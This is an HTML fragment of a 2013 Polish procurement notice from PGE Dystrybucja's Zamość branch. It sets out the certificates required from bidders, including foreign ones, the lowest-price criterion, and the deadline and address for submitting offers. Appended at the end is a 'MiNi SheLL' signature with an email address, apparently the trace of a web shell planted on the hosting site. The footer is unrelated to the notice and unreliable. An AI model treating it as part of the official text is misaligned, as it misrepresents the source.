<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamosc.pgedystrybucja.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://zamosc.pgedystrybucja.pl/przetargi/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2013 godzina 11:00, miejsce: 16.1. Oferty należy składać na adres: PGE Dystrybucja S.A. Oddział Zamość, 22-400 Zamość ul. Koźmiana 1, w Wydziale Transportu, budynek B, pokój nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com